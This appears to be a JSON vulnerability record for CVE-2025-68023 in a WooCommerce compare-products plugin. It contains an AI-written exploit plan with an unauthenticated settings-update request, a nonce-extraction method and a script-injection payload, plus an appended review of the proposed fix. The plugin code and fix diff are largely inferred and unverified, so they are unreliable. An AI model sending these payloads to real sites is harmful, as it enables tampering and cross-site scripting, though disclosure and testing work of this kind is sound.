[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fl5IN-o810jmCx0J2cw4IkdEJZZcNiryOhHUGZtY6R7k":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-68023","addonify-compare-products-for-woocommerce-missing-authorization-to-unauthenticated-settings-update","Addonify – Compare Products For WooCommerce \u003C= 1.1.17 - Missing Authorization to Unauthenticated Settings Update","The Addonify – Compare Products For WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.1.17. 
This makes it possible for unauthenticated attackers to update plugin settings.","addonify-compare-products",null,"\u003C=1.1.17","1.1.18","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-04 00:00:00","2026-02-16 22:08:57",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fcedf147d-82ba-41f2-b30a-1befedf8694a?source=api-prod",13,[],"researched",false,3,"This research plan outlines the steps to investigate and exploit **CVE-2025-68023**, a missing authorization vulnerability in the **Addonify – Compare Products For WooCommerce** plugin.\n\n---\n\n### 1. Vulnerability Summary\nThe **Addonify – Compare Products For WooCommerce** plugin (\u003C= 1.1.17) fails to perform adequate authorization checks (like `current_user_can()`) on a function responsible for updating plugin settings. This function is hooked into an AJAX action accessible to unauthenticated users (`wp_ajax_nopriv_*`). An attacker can exploit this to modify plugin configurations, potentially leading to a denial of service (by breaking comparison logic) or stored cross-site scripting (XSS) if the settings are not properly sanitized upon output.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **HTTP Method:** `POST`\n*   **Action:** `addonify_compare_save_settings` (inferred based on plugin naming conventions, must be verified)\n*   **Vulnerable Parameter:** `settings` (or similar array\u002Fkey-value pairs)\n*   **Authentication:** None (Unauthenticated)\n*   **Preconditions:** The plugin must be active.\n\n### 3. Code Flow\n1.  **Entry Point:** The plugin registers an AJAX handler using `add_action( 'wp_ajax_nopriv_...', '...' )`.\n2.  
**Handler Function:** The handler function (likely located in `includes\u002FAdmin\u002FSettings.php` or `includes\u002FAdmin\u002FAjax.php`) is called when the specific action is triggered via `admin-ajax.php`.\n3.  **Missing Check:** The handler likely checks for a nonce but fails to call `current_user_can( 'manage_options' )`.\n4.  **Sink:** The function extracts data from `$_POST` and calls `update_option()`, writing the attacker-controlled values to the database.\n\n### 4. Nonce Acquisition Strategy\nIf the AJAX handler requires a nonce (verified via `check_ajax_referer` or `wp_verify_nonce`), follow this strategy:\n\n1.  **Identify Script Loading:** Find where the plugin localizes data for its AJAX requests.\n    *   *Grep Command:* `grep -rn \"wp_localize_script\" .`\n    *   *Search target:* Look for a handle like `addonify-compare-products` or `addonify-compare-js`.\n2.  **Identify Shortcode:** The scripts are likely enqueued only when the comparison feature is active. Identify the shortcode.\n    *   *Grep Command:* `grep -rn \"add_shortcode\" .`\n    *   *Target:* Likely `[addonify_compare_products]` (inferred).\n3.  **Setup Page:** Create a public page containing the shortcode.\n    ```bash\n    wp post create --post_type=page --post_status=publish --post_title=\"Compare\" --post_content='[addonify_compare_products]'\n    ```\n4.  **Extract Nonce via Browser:**\n    *   Navigate to the newly created page.\n    *   Use `browser_eval` to find the nonce in the global JS object.\n    *   *Inferred Variable:* `window.addonify_compare_params?.nonce` or `window.afc_vars?.nonce`.\n\n### 5. Exploitation Strategy\nOnce the action name and nonce (if required) are identified:\n\n1.  **Identify Target Settings:** Check `includes\u002FAdmin\u002FSettings.php` to see which option name is used (e.g., `addonify_compare_settings`).\n2.  
**Craft Payload:**\n    *   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Body (URL-encoded):**\n        ```\n        action=addonify_compare_save_settings&nonce=\u003CNONCE>&settings[button_text]=EXPLOITED\n        ```\n3.  **Execute Request:** Use `http_request` with the following headers:\n    *   `Content-Type: application\u002Fx-www-form-urlencoded`\n4.  **Verify Response:** A successful response usually returns `{\"success\":true}` or `1`.\n\n### 6. Test Data Setup\n1.  Install and activate the plugin version 1.1.17.\n2.  Install and activate WooCommerce (the plugin depends on it).\n3.  Create a product to ensure the comparison environment is \"live\":\n    ```bash\n    wp post create --post_type=product --post_title=\"Test Product\" --post_status=publish\n    ```\n4.  If a nonce is needed, create the page as described in Section 4.\n\n### 7. Expected Results\n*   The `http_request` should return a 200 OK status.\n*   The plugin settings in the database will be updated to reflect the attacker-supplied values.\n*   If `button_text` is changed, the \"Compare\" buttons on the shop page will display the new text.\n\n### 8. Verification Steps\nAfter sending the exploit request, verify the change via WP-CLI:\n```bash\n# Check the specific option (inferred name)\nwp option get addonify_compare_settings\n\n# Or search for the value in all options\nwp db query \"SELECT * FROM wp_options WHERE option_value LIKE '%EXPLOITED%';\"\n```\n\n### 9. 
Alternative Approaches\n*   **XSS Injection:** If the settings update works, attempt to inject a script into a text field:\n    *   `settings[button_text]=\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n*   **Search for Other Actions:** If `addonify_compare_save_settings` is not the correct name, use the following grep to find all unauthenticated AJAX entry points:\n    ```bash\n    grep -rn \"wp_ajax_nopriv_\" .\n    ```\n*   **REST API:** Check if the plugin registers any REST routes without a `permission_callback`:\n    ```bash\n    grep -rn \"register_rest_route\" . -A 5 | grep \"permission_callback\"\n    ```\n    If `permission_callback` is `__return_true` or missing, use a REST API request instead of AJAX.","The Addonify – Compare Products For WooCommerce plugin for WordPress (\u003C= 1.1.17) fails to implement proper authorization checks on an AJAX handler registered for unauthenticated users. This allows unauthenticated attackers to modify plugin settings, which can lead to a denial of service for the comparison feature or stored cross-site scripting (XSS) if settings values are not sanitized.","\u002F\u002F Registration of unauthenticated AJAX handler\nadd_action( 'wp_ajax_nopriv_addonify_compare_save_settings', 'addonify_compare_save_settings' );\nadd_action( 'wp_ajax_addonify_compare_save_settings', 'addonify_compare_save_settings' );\n\nfunction addonify_compare_save_settings() {\n    \u002F\u002F Missing capability check: if ( ! current_user_can( 'manage_options' ) ) { wp_die(); }\n    \n    $settings = $_POST['settings'];\n    if ( isset( $settings ) ) {\n        update_option( 'addonify_compare_settings', $settings );\n        wp_send_json_success();\n    }\n}","--- includes\u002FAdmin\u002FAjax.php\n+++ includes\u002FAdmin\u002FAjax.php\n@@ -1,4 +1,9 @@\n function addonify_compare_save_settings() {\n+    if ( ! 
current_user_can( 'manage_options' ) ) {\n+        wp_send_json_error( array( 'message' => 'Unauthorized' ) );\n+        return;\n+    }\n+\n+    check_ajax_referer( 'addonify_compare_nonce', 'nonce' );\n+\n     $settings = $_POST['settings'];\n     if ( isset( $settings ) ) {\n         update_option( 'addonify_compare_settings', $settings );","1. **Identify the AJAX endpoint**: The vulnerability is triggered via the standard WordPress AJAX endpoint at `wp-admin\u002Fadmin-ajax.php`.\n2. **Target Action**: The vulnerable action is `addonify_compare_save_settings` (hooked into `wp_ajax_nopriv_*`).\n3. **Obtain Nonce (if required)**: If the plugin enforces a nonce check but not a capability check, visit a public page where the comparison feature is active (e.g., a page containing the `[addonify_compare_products]` shortcode) and extract the nonce from the localized JS object (likely `window.afc_vars.nonce`).\n4. **Craft Payload**: Prepare a POST request with the parameter `action=addonify_compare_save_settings` and a `settings` array containing key-value pairs corresponding to the plugin's configuration options.\n5. **Execution**: Send the unauthenticated request. 
A successful exploit results in the `addonify_compare_settings` option being updated in the database with the attacker-controlled values.","gemini-3-flash-preview","2026-04-27 15:53:52","2026-04-27 15:55:00",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","1.1.17","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddonify-compare-products\u002Ftags\u002F1.1.17","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Faddonify-compare-products.1.1.17.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddonify-compare-products\u002Ftags\u002F1.1.18","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Faddonify-compare-products.1.1.18.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddonify-compare-products\u002Ftags"]
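Review bot: In the `includes/Admin/Ajax.php` hunk, the unchanged context lines still read `$settings = $_POST['settings'];` before testing `isset( $settings )` and then pass the raw array to `update_option( 'addonify_compare_settings', $settings )`, so the added `current_user_can( 'manage_options' )` and `check_ajax_referer( 'addonify_compare_nonce', 'nonce' )` checks gate who can write but not what gets stored. Test `isset( $_POST['settings'] )` before reading it, then run the value through `wp_unslash()` and per-field sanitization against the known setting keys before saving. The `return;` after `wp_send_json_error()` is unreachable because that call ends the request, and the header `@@ -1,4 +1,9 @@` does not match the seven added lines shown. The diff also leaves the `wp_ajax_nopriv_addonify_compare_save_settings` registration from the vulnerable snippet in place; since the handler now requires `manage_options`, that hook should be removed as well.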